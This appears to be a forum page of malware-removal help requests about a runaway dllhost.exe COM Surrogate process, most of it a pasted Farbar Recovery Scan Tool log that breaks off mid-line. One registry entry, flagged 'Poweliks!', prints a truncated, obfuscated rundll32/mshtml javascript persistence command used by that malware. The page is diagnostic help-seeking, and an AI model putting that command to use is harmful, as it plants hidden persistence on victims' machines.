2013-07-29 01:32 - 00000000 ____D () C:\Users\Kulle\Downloads\14aren ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll => File is digitally signed C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-09-08 08:42 ==================== End Of Log ============================
  9. Please help with dllhost.exe *32 COM surrogate removal. dllhost.exe process using up 100% of CPU. Please see enclosed scan files. Need fixlist.txt file. Thanks! FRST.txt Addition.txt Shortcut.txt malwarebytes threat scan log.txt
  10. Hi I'm new to the site but in desperate need of help. Usually I can rid my pc of infections with free online software. However, this one seems to be quite nasty. I've done a lot of research on the problem and even seen people on this site having the same issue. In the task manager I have several instances of dllhoste.exe *32 running and eating up all the memory in my pc to the point of almost being completely unfunctional. I located the file in C:/ Windows/ SysWOW64 and tried to delete the .exe file but of course I was unable to because I did not have permission to perform the action despite my administrator privileges. I did however download FRST and run a full scan. I will attach the results of the FRST.txt and Addition.txt files in hopes to start the recovery process. Is there anyone who can help me vanquish this demon? Thanks in advance for any help I may receive! FRST.txt Addition.txt
  11. Hello, I am having issues with multiple "dllhost.exe *32" COM Surrogate process running and these processes keep coming back even after manually deleting them. "dllhost.exe *32 COM Surrogate process" hog CPU and memory of my system. Also, I am getting a periodic "Powershell has stopped working" messages. I searched for online solution and found one topic on this website (https://forums.malwarebytes.org/index.php?/topic/148375-issue-with-dllhostexe-com-surrogate/) and followed steps, but my issue did not resolve. Either I missed something or did not follow the steps correctly, so starting fresh thread. I would appreciate your help. Thanks, Arun. When I posted the FRST and Addition log results here, it complained of post being too long. So I am attaching Addition logs and pasting FRST below. Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 03-09-2014 02 Ran by akumar (administrator) on AKUMAR on 06-09-2014 22:48:13 Running from C:\Users\akumar\Desktop\FRST Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States) Internet Explorer Version 9 Boot Mode: Normal The only official download link for FRST: Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ Download link from any site other than Bleeping Computer is unpermitted or outdated. See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Lenovo.) C:\Windows\System32\ibmpmsvc.exe (Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\btwdins.exe (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe (Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\Host Intrusion Prevention\FireSvc.exe (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\Host Intrusion Prevention\HIPSCore\x64\HIPSvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe (Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe (Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe (Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\lvvsst.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlk.exe (Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\virtscrl.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise\McSACore.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\vstskmgr.exe (McAfee, Inc.) C:\Windows\System32\mfevtps.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\mfeann.exe (Oracle Corporation) C:\ProgramData\Oracle\MyDesktop\mydesktopservice.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\Host Intrusion Prevention\FireTray.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Protexis Inc.) C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe (Oracle) C:\ProgramData\Oracle\MyDesktop\MyDesktopQOS.exe () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe (Conexant Systems, Inc.) C:\Windows\SysWOW64\SASrv.exe (SonicWALL, Inc.) C:\Program Files\SonicWALL\SonicWALL Global VPN Client\SWGVCSvc.exe (Numara Software, Inc.) C:\Windows\TIREMOTE\TIRemoteService.exe () C:\Program Files (x86)\TATA DOCOMO 3G\ZTE\AssistantServices.exe (Ulead Systems, Inc.) C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe (Intel Corporation) C:\Windows\System32\igfxext.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Lenovo Group Limited) C:\Program Files\Lenovo\ZOOM\TpScrex.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPONSCR.exe (Lenovo Group Limited) C:\Program Files\Lenovo\AutoLock\ALCKRESI.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe (Lenovo.) C:\Windows\System32\TpShocks.exe () C:\Program Files\CONEXANT\ForteConfig\fmapp.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE (Microsoft Corporation) C:\Windows\System32\StikyNot.exe (Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe (Hewlett-Packard Company) C:\Hewlett-Packard\ESS Sizers\Smart Update Process\Bin\HPSizingToolUpdateProcess.exe (Ricoh co.,Ltd.) C:\Program Files (x86)\Integrated Camera Driver\X64\RCIMGDIR.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe () C:\Program Files (x86)\TATA DOCOMO 3G\ZTE\UIExec.exe (RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\shstat.exe (Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\UdaterUI.exe (Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe (Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE (Microsoft Corporation) C:\Windows\System32\taskmgr.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe (Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [ALCKRESI.EXE] => C:\Program Files\Lenovo\AutoLock\ALCKRESI.EXE [386408 2011-09-27] (Lenovo Group Limited) HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2868496 2011-12-23] (Synaptics Incorporated) HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [44096 2012-01-16] (Lenovo Group Limited) HKLM\...\Run: [TpShocks] => C:\Windows\system32\TpShocks.exe [380776 2011-03-29] (Lenovo.) HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] () HKLM\...\Run: [smartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [316032 2010-12-14] (Conexant systems, Inc.) HKLM-x32\...\Run: [RotateImage] => C:\Program Files (x86)\Integrated Camera Driver\X64\RCIMGDIR.exe [55808 2008-10-30] (Ricoh co.,Ltd.) HKLM-x32\...\Run: [PWMTRV] => rundll32 C:\PROGRA~2\ThinkPad\UTILIT~1\PWMTR64V.DLL,PwrMgrBkGndMonitor HKLM-x32\...\Run: [bCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation) HKLM-x32\...\Run: [uIExec] => C:\Program Files (x86)\TATA DOCOMO 3G\ZTE\UIExec.exe [139088 2011-04-02] () HKLM-x32\...\Run: [McAfee Host Intrusion Prevention Tray] => C:\Program Files (x86)\McAfee\Host Intrusion Prevention\FireTray.exe [979104 2010-06-15] (McAfee, Inc.) HKLM-x32\...\Run: [TkBellExe] => C:\Program Files (x86)\Real\RealPlayer\update\realsched.exe [295512 2013-06-19] (RealNetworks, Inc.) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated) HKLM-x32\...\Run: [shStatEXE] => C:\Program Files (x86)\McAfee\VirusScan Enterprise\SHSTAT.EXE [243560 2014-01-15] (McAfee, Inc.) HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-01-20] (Apple Inc.) HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.) HKLM-x32\...\Run: [McAfeeUpdaterUI] => C:\Program Files (x86)\McAfee\Common Framework\udaterui.exe [337768 2014-02-20] (McAfee, Inc.) HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [707496 2014-06-10] (Cisco Systems, Inc.) HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot% <====== ATTENTION HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%*.exe <====== ATTENTION HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%System32\*.exe <====== ATTENTION HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir% <====== ATTENTION Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKLM\...\Policies\Explorer: [NoFolderOptions] 0 HKLM\...\Policies\Explorer: [NoControlPanel] 0 HKU\S-1-5-21-4217662095-1469401848-865576887-500-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {9849b1c8-416e-11e1-b55c-806e6f6e6963} - D:\SETUP.EXE HKU\S-1-5-21-998467208-754410358-1295600288-10396\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [720064 2013-04-22] (Microsoft Corporation) HKU\S-1-5-21-998467208-754410358-1295600288-10396\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation) HKU\S-1-5-21-998467208-754410358-1295600288-10396\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_11_9_900_170_ActiveX.exe [839560 2014-01-08] (Adobe Systems Incorporated) HKU\S-1-5-21-998467208-754410358-1295600288-10396\...\MountPoints2: {f442b3af-4fae-11e2-b8c5-a088b459be00} - E:\Windows\Autorun.exe HKU\S-1-5-21-998467208-754410358-1295600288-10396\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! HKU\S-1-5-21-998467208-754410358-1295600288-10396-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [720064 2013-04-22] (Microsoft Corporation) HKU\S-1-5-21-998467208-754410358-1295600288-10396-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation) HKU\S-1-5-21-998467208-754410358-1295600288-10396-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {f442b3af-4fae-11e2-b8c5-a088b459be00} - E:\Windows\Autorun.exe Startup: C:\Users\akumar\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk ShortcutTarget: Bluetooth.lnk -> C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe (Broadcom Corporation.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Sizing Tool Update Process.lnk ShortcutTarget: HP Sizing Tool Update Process.lnk -> C:\Hewlett-Packard\ESS Sizers\Smart Update Process\Bin\HPSizingToolUpdateProcess.exe (Hewlett-Packard Company) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xB59DC4B28363CE01 HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise\McIEPlg.dll (McAfee, Inc.) StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.7.0_51\bin\ssv.dll (Oracle Corporation) BHO: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files\Common Files\McAfee\SystemCore\ScriptSn.20140718131315.dll (McAfee, Inc.) BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.7.0_51\bin\jp2ssv.dll (Oracle Corporation) BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader) BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.7.0_51\bin\ssv.dll (Oracle Corporation) BHO-x32: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files (x86)\Common Files\McAfee\SystemCore\ScriptSn.20140718131316.dll (McAfee, Inc.) BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation) BHO-x32: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise\McIEPlg.dll (McAfee, Inc.) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.7.0_51\bin\jp2ssv.dll (Oracle Corporation) Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) Toolbar: HKLM-x32 - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise\McIEPlg.dll (McAfee, Inc.) Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) DPF: HKLM-x32 {00000035-9593-4264-8B29-930B3E4EDCCD} https://www.rooms.hp.com/vRoom_Cab/WebHPVCInstall35.cab DPF: HKLM-x32 {67AB7FBE-251A-49E7-87EE-442F120D9364} https://acmepacket.acceptondemand.com/InstallClient/AcceptClient_IE.cab DPF: HKLM-x32 {CF84DAC5-A4F5-419E-A0BA-C01FFD71112F} http://content.systemrequirementslab.com.s3.amazonaws.com/global/bin/srldetect_intel_4.5.5.0.cab DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/WBXclient-T27L10NSP32EP15-15155/webex/ieatgpc1.cab Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - No File Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - No File Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation) Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise\McIEPlg.dll (McAfee, Inc.) Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise\McIEPlg.dll (McAfee, Inc.) Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies) Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 FireFox: ======== FF ProfilePath: C:\Users\akumar\AppData\Roaming\Mozilla\Firefox\Profiles\mvs3zhtd.default FF Homepage: hxxp://my.oracle.com/site/nasc FF NetworkProxy: "autoconfig_url", "http://wpad.us.oracle.com/wpad.dat" FF NetworkProxy: "type", 2 FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll () FF Plugin: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files\Java\jre1.7.0_51\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files\Java\jre1.7.0_51\bin\plugin2\npjp2.dll (Oracle Corporation) FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre1.7.0_51\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre1.7.0_51\bin\plugin2\npjp2.dll (Oracle Corporation) FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @real.com/nppl3260;version=16.0.2.32 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprpplugin;version=16.0.2.32 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer) FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npatgpc.dll (Cisco WebEx LLC) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppl3260.dll (RealNetworks, Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nprpplugin.dll (RealPlayer) FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-07-14] FF HKLM-x32\...\Firefox\Extensions: [{B7082FAA-CB62-4872-9106-E42DD88EDE45}] - C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise FF Extension: McAfee SiteAdvisor Enterprise - C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise [2013-06-03] FF HKLM-x32\...\Firefox\Extensions: [{FCE04E1F-9378-4f39-96F6-5689A9159E45}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-06-19] FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext FF HKLM-x32\...\Firefox\Extensions: [{D19CA586-DD6C-4a0a-96F8-14644F340D60}] - C:\Program Files (x86)\Common Files\McAfee\SystemCore FF Extension: IDS_SS_NAME - C:\Program Files (x86)\Common Files\McAfee\SystemCore [2013-09-30] Chrome: ======= CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-04-16] CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-07-14] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation) R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation) S3 DozeSvc; C:\Program Files (x86)\ThinkPad\Utilities\DZSVC64.EXE [320576 2012-03-15] (Lenovo.) R2 enterceptAgent; C:\Program Files (x86)\McAfee\Host Intrusion Prevention\FireSvc.exe [1498224 2010-06-15] (McAfee, Inc.) R2 hips; C:\Program Files 